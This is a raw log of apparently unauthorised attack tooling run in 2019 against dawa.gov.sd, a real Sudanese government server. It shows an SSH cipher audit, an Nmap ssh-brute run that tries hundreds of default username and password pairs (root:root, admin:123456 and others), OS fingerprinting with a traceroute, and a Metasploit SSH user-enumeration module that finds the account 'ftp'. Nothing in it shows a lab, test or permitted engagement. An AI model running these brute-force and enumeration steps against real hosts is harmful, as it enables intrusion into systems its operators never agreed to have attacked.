692. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
693. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
694. `- [warn] using small 1024-bit modulus
695. `- [warn] using weak hashing algorithm
696. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
697.  
698. # host-key algorithms
699. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
700. (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
701. (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
702. (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
703. `- [warn] using weak random number generator could reveal the key
704. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
705. (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
706.  
707. # encryption algorithms (ciphers)
708. (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
709. `- [info] default cipher since OpenSSH 6.9.
710. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
711. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
712. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
713. (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
714. (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
715. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
716. `- [warn] using weak cipher mode
717. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
718. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
719. `- [warn] using weak cipher mode
720. `- [info] available since OpenSSH 2.3.0
721. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
722. `- [warn] using weak cipher mode
723. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
724. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
725. `- [fail] disabled since Dropbear SSH 0.53
726. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
727. `- [warn] using weak cipher mode
728. `- [warn] using small 64-bit block size
729. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
730. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
731. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
732. `- [warn] using weak cipher mode
733. `- [warn] using small 64-bit block size
734. `- [info] available since OpenSSH 2.1.0
735. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
736. `- [warn] using weak cipher
737. `- [warn] using weak cipher mode
738. `- [warn] using small 64-bit block size
739. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
740.  
741. # message authentication code algorithms
742. (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
743. `- [info] available since OpenSSH 6.2
744. (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
745. (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
746. (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
747. (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
748. `- [info] available since OpenSSH 6.2
749. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
750. `- [warn] using small 64-bit tag size
751. `- [info] available since OpenSSH 4.7
752. (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
753. `- [info] available since OpenSSH 6.2
754. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
755. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
756. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
757. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
758. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
759. `- [warn] using weak hashing algorithm
760. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
761.  
762. # algorithm recommendations (for OpenSSH 7.4)
763. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
764. (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
765. (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
766. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
767. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
768. (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
769. (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
770. (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
771. (rec) -blowfish-cbc -- enc algorithm to remove
772. (rec) -3des-cbc -- enc algorithm to remove
773. (rec) -aes256-cbc -- enc algorithm to remove
774. (rec) -cast128-cbc -- enc algorithm to remove
775. (rec) -aes192-cbc -- enc algorithm to remove
776. (rec) -aes128-cbc -- enc algorithm to remove
777. (rec) -hmac-sha2-512 -- mac algorithm to remove
778. (rec) -umac-128@openssh.com -- mac algorithm to remove
779. (rec) -hmac-sha2-256 -- mac algorithm to remove
780. (rec) -umac-64@openssh.com -- mac algorithm to remove
781. (rec) -hmac-sha1 -- mac algorithm to remove
782. (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
783. (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
784. #######################################################################################################################################
785. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:01 EDT
786. NSE: [ssh-run] Failed to specify credentials and command to run.
787. NSE: [ssh-brute] Trying username/password pair: root:root
788. NSE: [ssh-brute] Trying username/password pair: admin:admin
789. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
790. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
791. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
792. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
793. NSE: [ssh-brute] Trying username/password pair: guest:guest
794. NSE: [ssh-brute] Trying username/password pair: user:user
795. NSE: [ssh-brute] Trying username/password pair: web:web
796. NSE: [ssh-brute] Trying username/password pair: test:test
797. NSE: [ssh-brute] Trying username/password pair: root:
798. NSE: [ssh-brute] Trying username/password pair: admin:
799. NSE: [ssh-brute] Trying username/password pair: administrator:
800. NSE: [ssh-brute] Trying username/password pair: webadmin:
801. NSE: [ssh-brute] Trying username/password pair: sysadmin:
802. NSE: [ssh-brute] Trying username/password pair: netadmin:
803. NSE: [ssh-brute] Trying username/password pair: guest:
804. NSE: [ssh-brute] Trying username/password pair: user:
805. NSE: [ssh-brute] Trying username/password pair: web:
806. NSE: [ssh-brute] Trying username/password pair: test:
807. NSE: [ssh-brute] Trying username/password pair: root:123456
808. NSE: [ssh-brute] Trying username/password pair: admin:123456
809. NSE: [ssh-brute] Trying username/password pair: administrator:123456
810. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
811. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
812. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
813. NSE: [ssh-brute] Trying username/password pair: guest:123456
814. NSE: [ssh-brute] Trying username/password pair: user:123456
815. NSE: [ssh-brute] Trying username/password pair: web:123456
816. NSE: [ssh-brute] Trying username/password pair: test:123456
817. NSE: [ssh-brute] Trying username/password pair: root:12345
818. NSE: [ssh-brute] Trying username/password pair: admin:12345
819. NSE: [ssh-brute] Trying username/password pair: administrator:12345
820. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
821. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
822. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
823. NSE: [ssh-brute] Trying username/password pair: guest:12345
824. NSE: [ssh-brute] Trying username/password pair: user:12345
825. NSE: [ssh-brute] Trying username/password pair: web:12345
826. NSE: [ssh-brute] Trying username/password pair: test:12345
827. NSE: [ssh-brute] Trying username/password pair: root:123456789
828. NSE: [ssh-brute] Trying username/password pair: admin:123456789
829. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
830. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
831. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
832. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
833. NSE: [ssh-brute] Trying username/password pair: guest:123456789
834. NSE: [ssh-brute] Trying username/password pair: user:123456789
835. NSE: [ssh-brute] Trying username/password pair: web:123456789
836. NSE: [ssh-brute] Trying username/password pair: test:123456789
837. NSE: [ssh-brute] Trying username/password pair: root:password
838. NSE: [ssh-brute] Trying username/password pair: admin:password
839. NSE: [ssh-brute] Trying username/password pair: administrator:password
840. NSE: [ssh-brute] Trying username/password pair: webadmin:password
841. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
842. NSE: [ssh-brute] Trying username/password pair: netadmin:password
843. NSE: [ssh-brute] Trying username/password pair: guest:password
844. NSE: [ssh-brute] Trying username/password pair: user:password
845. NSE: [ssh-brute] Trying username/password pair: web:password
846. NSE: [ssh-brute] Trying username/password pair: test:password
847. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
848. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
849. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
850. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
851. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
852. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
853. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
854. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
855. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
856. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
857. NSE: [ssh-brute] Trying username/password pair: root:princess
858. NSE: [ssh-brute] Trying username/password pair: admin:princess
859. NSE: [ssh-brute] Trying username/password pair: administrator:princess
860. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
861. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
862. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
863. NSE: [ssh-brute] Trying username/password pair: guest:princess
864. NSE: [ssh-brute] Trying username/password pair: user:princess
865. NSE: [ssh-brute] Trying username/password pair: web:princess
866. NSE: [ssh-brute] Trying username/password pair: test:princess
867. NSE: [ssh-brute] Trying username/password pair: root:12345678
868. NSE: [ssh-brute] Trying username/password pair: admin:12345678
869. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
870. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
871. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
872. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
873. NSE: [ssh-brute] Trying username/password pair: guest:12345678
874. NSE: [ssh-brute] Trying username/password pair: user:12345678
875. NSE: [ssh-brute] Trying username/password pair: web:12345678
876. NSE: [ssh-brute] Trying username/password pair: test:12345678
877. NSE: [ssh-brute] Trying username/password pair: root:1234567
878. NSE: [ssh-brute] Trying username/password pair: admin:1234567
879. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
880. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
881. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
882. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
883. NSE: [ssh-brute] Trying username/password pair: guest:1234567
884. NSE: [ssh-brute] Trying username/password pair: user:1234567
885. NSE: [ssh-brute] Trying username/password pair: web:1234567
886. NSE: [ssh-brute] Trying username/password pair: test:1234567
887. NSE: [ssh-brute] Trying username/password pair: root:abc123
888. NSE: [ssh-brute] Trying username/password pair: admin:abc123
889. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
890. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
891. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
892. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
893. NSE: [ssh-brute] Trying username/password pair: guest:abc123
894. NSE: [ssh-brute] Trying username/password pair: user:abc123
895. NSE: [ssh-brute] Trying username/password pair: web:abc123
896. NSE: [ssh-brute] Trying username/password pair: test:abc123
897. NSE: [ssh-brute] Trying username/password pair: root:nicole
898. NSE: [ssh-brute] Trying username/password pair: admin:nicole
899. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
900. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
901. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
902. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
903. NSE: [ssh-brute] Trying username/password pair: guest:nicole
904. NSE: [ssh-brute] Trying username/password pair: user:nicole
905. NSE: [ssh-brute] Trying username/password pair: web:nicole
906. NSE: [ssh-brute] Trying username/password pair: test:nicole
907. NSE: [ssh-brute] Trying username/password pair: root:daniel
908. NSE: [ssh-brute] Trying username/password pair: admin:daniel
909. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
910. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
911. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
912. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
913. NSE: [ssh-brute] Trying username/password pair: guest:daniel
914. NSE: [ssh-brute] Trying username/password pair: user:daniel
915. NSE: [ssh-brute] Trying username/password pair: web:daniel
916. NSE: [ssh-brute] Trying username/password pair: test:daniel
917. NSE: [ssh-brute] Trying username/password pair: root:monkey
918. NSE: [ssh-brute] Trying username/password pair: admin:monkey
919. NSE: [ssh-brute] Trying username/password pair: administrator:monkey
920. NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
921. NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
922. NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
923. NSE: [ssh-brute] Trying username/password pair: guest:monkey
924. NSE: [ssh-brute] Trying username/password pair: user:monkey
925. NSE: [ssh-brute] Trying username/password pair: web:monkey
926. NSE: [ssh-brute] Trying username/password pair: test:monkey
927. NSE: [ssh-brute] Trying username/password pair: root:babygirl
928. NSE: [ssh-brute] Trying username/password pair: admin:babygirl
929. NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
930. NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
931. NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
932. NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
933. NSE: [ssh-brute] Trying username/password pair: guest:babygirl
934. NSE: [ssh-brute] Trying username/password pair: user:babygirl
935. NSE: [ssh-brute] Trying username/password pair: web:babygirl
936. NSE: [ssh-brute] Trying username/password pair: test:babygirl
937. NSE: [ssh-brute] Trying username/password pair: root:qwerty
938. NSE: [ssh-brute] Trying username/password pair: admin:qwerty
939. NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
940. NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
941. NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
942. NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
943. NSE: [ssh-brute] Trying username/password pair: guest:qwerty
944. NSE: [ssh-brute] Trying username/password pair: user:qwerty
945. NSE: [ssh-brute] Trying username/password pair: web:qwerty
946. NSE: [ssh-brute] Trying username/password pair: test:qwerty
947. NSE: [ssh-brute] Trying username/password pair: root:lovely
948. NSE: [ssh-brute] Trying username/password pair: admin:lovely
949. NSE: [ssh-brute] Trying username/password pair: administrator:lovely
950. NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
951. NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
952. NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
953. NSE: [ssh-brute] Trying username/password pair: guest:lovely
954. NSE: [ssh-brute] Trying username/password pair: user:lovely
955. NSE: [ssh-brute] Trying username/password pair: web:lovely
956. NSE: [ssh-brute] Trying username/password pair: test:lovely
957. NSE: [ssh-brute] Trying username/password pair: root:654321
958. NSE: [ssh-brute] Trying username/password pair: admin:654321
959. NSE: [ssh-brute] Trying username/password pair: administrator:654321
960. NSE: [ssh-brute] Trying username/password pair: webadmin:654321
961. NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
962. NSE: [ssh-brute] Trying username/password pair: netadmin:654321
963. NSE: [ssh-brute] Trying username/password pair: guest:654321
964. NSE: [ssh-brute] Trying username/password pair: user:654321
965. NSE: [ssh-brute] Trying username/password pair: web:654321
966. NSE: [ssh-brute] Trying username/password pair: test:654321
967. NSE: [ssh-brute] Trying username/password pair: root:michael
968. NSE: [ssh-brute] Trying username/password pair: admin:michael
969. NSE: [ssh-brute] Trying username/password pair: administrator:michael
970. NSE: [ssh-brute] Trying username/password pair: webadmin:michael
971. NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
972. NSE: [ssh-brute] Trying username/password pair: netadmin:michael
973. NSE: [ssh-brute] Trying username/password pair: guest:michael
974. NSE: [ssh-brute] Trying username/password pair: user:michael
975. NSE: [ssh-brute] Trying username/password pair: web:michael
976. NSE: [ssh-brute] Trying username/password pair: test:michael
977. NSE: [ssh-brute] Trying username/password pair: root:jessica
978. NSE: [ssh-brute] Trying username/password pair: admin:jessica
979. NSE: [ssh-brute] Trying username/password pair: administrator:jessica
980. NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
981. NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
982. NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
983. NSE: [ssh-brute] Trying username/password pair: guest:jessica
984. NSE: [ssh-brute] Trying username/password pair: user:jessica
985. NSE: [ssh-brute] Trying username/password pair: web:jessica
986. NSE: [ssh-brute] Trying username/password pair: test:jessica
987. NSE: [ssh-brute] Trying username/password pair: root:111111
988. NSE: [ssh-brute] Trying username/password pair: admin:111111
989. NSE: [ssh-brute] Trying username/password pair: administrator:111111
990. NSE: [ssh-brute] Trying username/password pair: webadmin:111111
991. NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
992. NSE: [ssh-brute] Trying username/password pair: netadmin:111111
993. NSE: [ssh-brute] Trying username/password pair: guest:111111
994. NSE: [ssh-brute] Trying username/password pair: user:111111
995. NSE: [ssh-brute] Trying username/password pair: web:111111
996. NSE: [ssh-brute] Trying username/password pair: test:111111
997. NSE: [ssh-brute] Trying username/password pair: root:ashley
998. NSE: [ssh-brute] Trying username/password pair: admin:ashley
999. NSE: [ssh-brute] Trying username/password pair: administrator:ashley
1000. NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
1001. NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
1002. NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
1003. NSE: [ssh-brute] Trying username/password pair: guest:ashley
1004. NSE: [ssh-brute] Trying username/password pair: user:ashley
1005. NSE: [ssh-brute] Trying username/password pair: web:ashley
1006. NSE: [ssh-brute] Trying username/password pair: test:ashley
1007. NSE: [ssh-brute] Trying username/password pair: root:000000
1008. NSE: [ssh-brute] Trying username/password pair: admin:000000
1009. NSE: [ssh-brute] Trying username/password pair: administrator:000000
1010. NSE: [ssh-brute] Trying username/password pair: webadmin:000000
1011. NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
1012. NSE: [ssh-brute] Trying username/password pair: netadmin:000000
1013. NSE: [ssh-brute] Trying username/password pair: guest:000000
1014. NSE: [ssh-brute] Trying username/password pair: user:000000
1015. NSE: [ssh-brute] Trying username/password pair: web:000000
1016. NSE: [ssh-brute] Trying username/password pair: test:000000
1017. NSE: [ssh-brute] Trying username/password pair: root:iloveu
1018. NSE: [ssh-brute] Trying username/password pair: admin:iloveu
1019. NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
1020. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
1021. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
1022. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
1023. NSE: [ssh-brute] Trying username/password pair: guest:iloveu
1024. NSE: [ssh-brute] Trying username/password pair: user:iloveu
1025. NSE: [ssh-brute] Trying username/password pair: web:iloveu
1026. NSE: [ssh-brute] Trying username/password pair: test:iloveu
1027. NSE: [ssh-brute] Trying username/password pair: root:michelle
1028. NSE: [ssh-brute] Trying username/password pair: admin:michelle
1029. NSE: [ssh-brute] Trying username/password pair: administrator:michelle
1030. NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
1031. NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
1032. NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
1033. NSE: [ssh-brute] Trying username/password pair: guest:michelle
1034. NSE: [ssh-brute] Trying username/password pair: user:michelle
1035. NSE: [ssh-brute] Trying username/password pair: web:michelle
1036. NSE: [ssh-brute] Trying username/password pair: test:michelle
1037. NSE: [ssh-brute] Trying username/password pair: root:tigger
1038. NSE: [ssh-brute] Trying username/password pair: admin:tigger
1039. NSE: [ssh-brute] Trying username/password pair: administrator:tigger
1040. NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
1041. NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
1042. NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
1043. NSE: [ssh-brute] Trying username/password pair: guest:tigger
1044. NSE: [ssh-brute] Trying username/password pair: user:tigger
1045. NSE: [ssh-brute] Trying username/password pair: web:tigger
1046. NSE: [ssh-brute] Trying username/password pair: test:tigger
1047. NSE: [ssh-brute] Trying username/password pair: root:sunshine
1048. NSE: [ssh-brute] Trying username/password pair: admin:sunshine
1049. NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
1050. NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
1051. NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
1052. NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
1053. NSE: [ssh-brute] Trying username/password pair: guest:sunshine
1054. NSE: [ssh-brute] Trying username/password pair: user:sunshine
1055. NSE: [ssh-brute] Trying username/password pair: web:sunshine
1056. NSE: [ssh-brute] Trying username/password pair: test:sunshine
1057. NSE: [ssh-brute] Trying username/password pair: root:chocolate
1058. NSE: [ssh-brute] Trying username/password pair: admin:chocolate
1059. NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
1060. NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
1061. NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
1062. NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
1063. NSE: [ssh-brute] Trying username/password pair: guest:chocolate
1064. NSE: [ssh-brute] Trying username/password pair: user:chocolate
1065. NSE: [ssh-brute] Trying username/password pair: web:chocolate
1066. NSE: [ssh-brute] Trying username/password pair: test:chocolate
1067. NSE: [ssh-brute] Trying username/password pair: root:password1
1068. NSE: [ssh-brute] Trying username/password pair: admin:password1
1069. NSE: [ssh-brute] Trying username/password pair: administrator:password1
1070. NSE: [ssh-brute] Trying username/password pair: webadmin:password1
1071. NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
1072. NSE: [ssh-brute] Trying username/password pair: netadmin:password1
1073. NSE: [ssh-brute] Trying username/password pair: guest:password1
1074. NSE: [ssh-brute] Trying username/password pair: user:password1
1075. NSE: [ssh-brute] Trying username/password pair: web:password1
1076. NSE: [ssh-brute] Trying username/password pair: test:password1
1077. NSE: [ssh-brute] Trying username/password pair: root:soccer
1078. NSE: [ssh-brute] Trying username/password pair: admin:soccer
1079. NSE: [ssh-brute] Trying username/password pair: administrator:soccer
1080. NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
1081. NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
1082. NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
1083. NSE: [ssh-brute] Trying username/password pair: guest:soccer
1084. NSE: [ssh-brute] Trying username/password pair: user:soccer
1085. NSE: [ssh-brute] Trying username/password pair: web:soccer
1086. NSE: [ssh-brute] Trying username/password pair: test:soccer
1087. NSE: [ssh-brute] Trying username/password pair: root:anthony
1088. NSE: [ssh-brute] Trying username/password pair: admin:anthony
1089. NSE: [ssh-brute] Trying username/password pair: administrator:anthony
1090. NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
1091. NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
1092. NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
1093. NSE: [ssh-brute] Trying username/password pair: guest:anthony
1094. NSE: [ssh-brute] Trying username/password pair: user:anthony
1095. NSE: [ssh-brute] Trying username/password pair: web:anthony
1096. NSE: [ssh-brute] Trying username/password pair: test:anthony
1097. NSE: [ssh-brute] Trying username/password pair: root:friends
1098. NSE: [ssh-brute] Trying username/password pair: admin:friends
1099. NSE: [ssh-brute] Trying username/password pair: administrator:friends
1100. NSE: [ssh-brute] Trying username/password pair: webadmin:friends
1101. NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
1102. NSE: [ssh-brute] Trying username/password pair: netadmin:friends
1103. NSE: [ssh-brute] Trying username/password pair: guest:friends
1104. NSE: [ssh-brute] Trying username/password pair: user:friends
1105. NSE: [ssh-brute] Trying username/password pair: web:friends
1106. NSE: [ssh-brute] Trying username/password pair: test:friends
1107. NSE: [ssh-brute] Trying username/password pair: root:purple
1108. NSE: [ssh-brute] Trying username/password pair: admin:purple
1109. NSE: [ssh-brute] Trying username/password pair: administrator:purple
1110. NSE: [ssh-brute] Trying username/password pair: webadmin:purple
1111. NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
1112. NSE: [ssh-brute] Trying username/password pair: netadmin:purple
1113. NSE: [ssh-brute] Trying username/password pair: guest:purple
1114. NSE: [ssh-brute] Trying username/password pair: user:purple
1115. NSE: [ssh-brute] Trying username/password pair: web:purple
1116. NSE: [ssh-brute] Trying username/password pair: test:purple
1117. NSE: [ssh-brute] Trying username/password pair: root:angel
1118. NSE: [ssh-brute] Trying username/password pair: admin:angel
1119. NSE: [ssh-brute] Trying username/password pair: administrator:angel
1120. NSE: [ssh-brute] Trying username/password pair: webadmin:angel
1121. NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
1122. NSE: [ssh-brute] Trying username/password pair: netadmin:angel
1123. NSE: [ssh-brute] Trying username/password pair: guest:angel
1124. NSE: [ssh-brute] Trying username/password pair: user:angel
1125. NSE: [ssh-brute] Trying username/password pair: web:angel
1126. NSE: [ssh-brute] Trying username/password pair: test:angel
1127. NSE: [ssh-brute] Trying username/password pair: root:butterfly
1128. NSE: [ssh-brute] Trying username/password pair: admin:butterfly
1129. NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
1130. NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
1131. NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
1132. NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
1133. NSE: [ssh-brute] Trying username/password pair: guest:butterfly
1134. NSE: [ssh-brute] Trying username/password pair: user:butterfly
1135. Nmap scan report for dawa.gov.sd (37.58.63.157)
1136. Host is up (0.11s latency).
1137.  
1138. PORT STATE SERVICE VERSION
1139. 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
1140. | ssh-auth-methods:
1141. | Supported authentication methods:
1142. | publickey
1143. | gssapi-keyex
1144. | gssapi-with-mic
1145. |_ password
1146. | ssh-brute:
1147. | Accounts: No valid accounts found
1148. |_ Statistics: Performed 348 guesses in 182 seconds, average tps: 1.9
1149. | ssh-hostkey:
1150. | 2048 f9:ea:f1:f9:88:4c:35:23:4f:31:fb:38:17:f9:40:39 (RSA)
1151. | 256 8c:07:13:65:fe:ef:69:09:f4:fb:ee:49:91:5a:33:38 (ECDSA)
1152. |_ 256 37:44:b4:9d:a4:1f:48:a1:d0:60:fe:4a:73:6c:99:67 (ED25519)
1153. | ssh-publickey-acceptance:
1154. |_ Accepted Public Keys: No public keys accepted
1155. |_ssh-run: Failed to specify credentials and command to run.
1156. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1157. Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), HP P2000 G3 NAS device (93%), Android 4.1.1 (92%)
1158. No exact OS matches for host (test conditions non-ideal).
1159. Network Distance: 14 hops
1160.  
1161. TRACEROUTE (using port 22/tcp)
1162. HOP RTT ADDRESS
1163. 1 20.04 ms 10.246.200.1
1164. 2 20.78 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
1165. 3 24.05 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
1166. 4 21.84 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
1167. 5 20.76 ms motl-b1-link.telia.net (62.115.162.41)
1168. 6 ...
1169. 7 119.53 ms ldn-bb3-link.telia.net (62.115.113.21)
1170. 8 118.17 ms prs-bb3-link.telia.net (62.115.134.92)
1171. 9 118.54 ms ffm-bb3-link.telia.net (62.115.123.12)
1172. 10 118.58 ms ffm-b10-link.telia.net (62.115.137.211)
1173. 11 112.76 ms leaseweb-ic-146206-ffm-b10.c.telia.net (80.239.132.78)
1174. 12 112.69 ms po-5.ce02.fra-10.de.leaseweb.net (178.162.223.153)
1175. 13 ...
1176. 14 112.76 ms 37.58.63.157
1177. #######################################################################################################################################
1178. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
1179. RHOSTS => dawa.gov.sd
1180. RHOST => dawa.gov.sd
1181. [*] 37.58.63.157:22 - SSH - Using malformed packet technique
1182. [*] 37.58.63.157:22 - SSH - Starting scan
1183. [-] 37.58.63.157:22 - SSH - User 'admin' not found
1184. [-] 37.58.63.157:22 - SSH - User 'administrator' not found
1185. [-] 37.58.63.157:22 - SSH - User 'anonymous' not found
1186. [-] 37.58.63.157:22 - SSH - User 'backup' not found
1187. [-] 37.58.63.157:22 - SSH - User 'bee' not found
1188. [+] 37.58.63.157:22 - SSH - User 'ftp' found
